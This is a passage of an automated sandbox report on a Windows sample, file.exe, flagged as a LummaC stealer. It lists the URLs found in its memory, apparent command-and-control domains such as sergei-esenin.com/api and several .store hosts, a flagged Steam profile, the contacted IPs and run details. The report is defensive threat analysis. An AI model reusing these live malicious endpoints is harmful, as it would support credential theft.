                                                          http://store.steampowered.com/privacy_agreement/file.exe, 00000000.00000003.2201818657.000000000126C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://store.steampowered.com/points/shop/file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201921458.0000000001272000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://steamcommunity.com/profiles/76561199724331900/inventory/file.exe, 00000000.00000003.2201818657.000000000126C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmptrue
                                                          • URL Reputation: malware
                                                          		unknown
                                                          https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpgfile.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201921458.0000000001272000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://store.steampowered.com/privacy_agreement/file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://www.cloudflare.com/learning/access-managfile.exe, 00000000.00000003.2201867746.0000000001239000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201946477.0000000001203000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2249509105.0000000001201000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            https://www.cloudflare.com/5xx-error-landingfile.exe, 00000000.00000003.2201867746.0000000001239000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=enfile.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201921458.0000000001272000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201921458.0000000001272000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://sergei-esenin.com:443/apifile.exe, 00000000.00000002.2249509105.00000000011EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=2Ih2WOq7ErXY&afile.exe, 00000000.00000003.2201818657.000000000126C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIfile.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201921458.0000000001272000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&amfile.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201921458.0000000001272000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=englishfile.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201921458.0000000001272000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=englishfile.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.pngfile.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://avatars.akamai.steamstaticfile.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://sergei-esenin.com:443/api:.file.exe, 00000000.00000002.2249509105.00000000011EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englisfile.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201921458.0000000001272000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhCfile.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://sergei-esenin.com/Tfile.exe, 00000000.00000002.2249509105.00000000011EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        https://store.steampowered.com/about/file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        https://steamcommunity.com/my/wishlist/file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201921458.0000000001272000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          https://sergei-esenin.com/Lfile.exe, 00000000.00000002.2249509105.00000000011EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&amp;l=englishfile.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201921458.0000000001272000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://sergei-esenin.com/apijfile.exe, 00000000.00000002.2249509105.0000000001239000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              https://help.steampowered.com/en/file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201921458.0000000001272000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              https://steamcommunity.com/market/file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                https://store.steampowered.com/news/file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201921458.0000000001272000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                http://store.steampowered.com/subscriber_agreement/file.exe, 00000000.00000003.2201818657.000000000126C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgfile.exe, 00000000.00000003.2201818657.000000000126C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1file.exe, 00000000.00000003.2201921458.0000000001272000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=enfile.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201921458.0000000001272000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://steamcommunity.com/discussions/file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    https://store.steampowered.com/stats/file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201921458.0000000001272000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    https://sergei-esenin.com/sWO%(file.exe, 00000000.00000003.2201867746.0000000001239000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1file.exe, 00000000.00000003.2201818657.000000000126C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      https://store.steampowered.com/steam_refunds/file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      https://community.akamai.steamstatic.com/public/shared/file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201921458.0000000001272000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		unknown
                                                                                        https://community.akamRfile.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201921458.0000000001272000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		unknown
                                                                                          https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            https://sergei-esenin.com/api1file.exe, 00000000.00000002.2249509105.0000000001201000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		unknown
                                                                                              https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=jGtzAgjYROne&amp;l=efile.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		unknown
                                                                                                https://clearancek.site:443/apifile.exe, 00000000.00000002.2249509105.00000000011EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		unknown
                                                                                                  https://steamcommunity.com/workshop/file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201921458.0000000001272000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		unknown
                                                                                                    https://community.akamai.steamfile.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201921458.0000000001272000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		unknown
                                                                                                      https://store.steampowered.com/legal/file.exe, 00000000.00000003.2201818657.000000000126C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      		unknown
                                                                                                      https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp;l=efile.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      		unknown
                                                                                                      https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSvfile.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      		unknown
                                                                                                      https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=englfile.exe, 00000000.00000003.2201921458.0000000001272000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      		unknown
                                                                                                      https://sergei-esenin.com/api&file.exe, 00000000.00000003.2201867746.0000000001239000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		unknown
                                                                                                        http://upx.sf.netAmcache.hve.5.drfalse
                                                                                                        • URL Reputation: safe
                                                                                                        		unknown
                                                                                                        https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2d-file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201921458.0000000001272000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		unknown
                                                                                                          https://store.steampowered.com/file.exe, 00000000.00000003.2201921458.0000000001272000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvwfile.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          https://studennotediw.store:443/apifile.exe, 00000000.00000002.2249509105.00000000011EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		unknown
                                                                                                            https://mobbipenju.store:443/apifile.exe, 00000000.00000002.2249509105.00000000011EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		unknown
                                                                                                              https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.giffile.exe, 00000000.00000003.2201818657.000000000126C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201946477.0000000001203000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              https://clearancek.site:443/apiifile.exe, 00000000.00000002.2249509105.00000000011EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		unknown
                                                                                                                https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                https://spirittunek.store:443/apifile.exe, 00000000.00000002.2249509105.00000000011EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		unknown
                                                                                                                  https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=bz0kMfQAfile.exe, 00000000.00000003.2201818657.000000000126C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		unknown
                                                                                                                    https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=englishfile.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201921458.0000000001272000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    		unknown
                                                                                                                    http://store.steampowered.com/account/cookiepreferences/file.exe, 00000000.00000003.2201818657.000000000126C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    		unknown
                                                                                                                    https://store.steampowered.com/mobilefile.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    		unknown
                                                                                                                    https://steamcommunity.com/file.exe, 00000000.00000003.2201921458.0000000001272000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		unknown
                                                                                                                      https://steamcommunity.com:443/profiles/76561199724331900Nfile.exe, 00000000.00000002.2249509105.00000000011EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		unknown
                                                                                                                        https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&amp;l=englishfile.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        		unknown
                                                                                                                        https://community.akamai.steamstatic.com/public/sfile.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201921458.0000000001272000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		unknown
                                                                                                                          https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&amp;l=englfile.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201921458.0000000001272000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          		unknown
                                                                                                                          https://steamcommunity.com/profiles/76561199724331900/badgesfile.exe, 00000000.00000003.2201818657.000000000126C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201818657.0000000001270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201946477.0000000001203000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201853552.0000000001277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201906491.000000000127A000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                          • URL Reputation: malware
                                                                                                                          		unknown

                                                                                                                          World Map of Contacted IPs

                                                                                                                          • No. of IPs < 25%
                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                          • 75% < No. of IPs

                                                                                                                          Public IPs

                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                          104.21.53.8
                                                                                                                          		sergei-esenin.comUnited States
                                                                                                                          		13335CLOUDFLARENETUStrue
                                                                                                                          104.102.49.254
                                                                                                                          		steamcommunity.comUnited States
                                                                                                                          		16625AKAMAI-ASUStrue

                                                                                                                          General Information

                                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                                          Analysis ID:1532854
                                                                                                                          Start date and time:2024-10-14 01:52:08 +02:00
                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                          Overall analysis duration:0h 5m 0s
                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                          Report type:full
                                                                                                                          Cookbook file name:default.jbs
                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                          Number of analysed new started processes analysed:9
                                                                                                                          Number of new started drivers analysed:0
                                                                                                                          Number of existing processes analysed:0
                                                                                                                          Number of existing drivers analysed:0
                                                                                                                          Number of injected processes analysed:0
                                                                                                                          Technologies:
                                                                                                                          • HCA enabled
                                                                                                                          • EGA enabled
                                                                                                                          • AMSI enabled
                                                                                                                          Analysis Mode:default
                                                                                                                          Analysis stop reason:Timeout
                                                                                                                          Sample name:file.exe
                                                                                                                          Detection:MAL
                                                                                                                          Classification:mal100.troj.evad.winEXE@3/5@10/2
                                                                                                                          EGA Information:
                                                                                                                          • Successful, ratio: 100%
                                                                                                                          HCA Information:Failed
                                                                                                                          Cookbook Comments:
                                                                                                                          • Found application associated with file extension: .exe

                                                                                                                          Warnings

                                                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                                          • Excluded IPs from analysis (whitelisted): 20.189.173.22
                                                                                                                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                          • VT rate limit hit for: file.exe

                                                                                                                          Simulations

                                                                                                                          Behavior and APIs

                                                                                                                          TimeTypeDescription
                                                                                                                          19:53:07API Interceptor3x Sleep call for process: file.exe modified
                                                                                                                          19:53:13API Interceptor1x Sleep call for process: WerFault.exe modified

                                                                                                                          Joe Sandbox View / Context

                                                                                                                          IPs

                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                          104.21.53.8SecuriteInfo.com.Win32.Evo-gen.11764.10915.exeGet hashmaliciousLummaCBrowse
                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                        Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              104.102.49.254http://gtm-cn-j4g3qqvf603.steamproxy1.com/Get hashmaliciousUnknownBrowse
                                                                                                                                              • www.valvesoftware.com/legal.htm

                                                                                                                                              Domains

                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
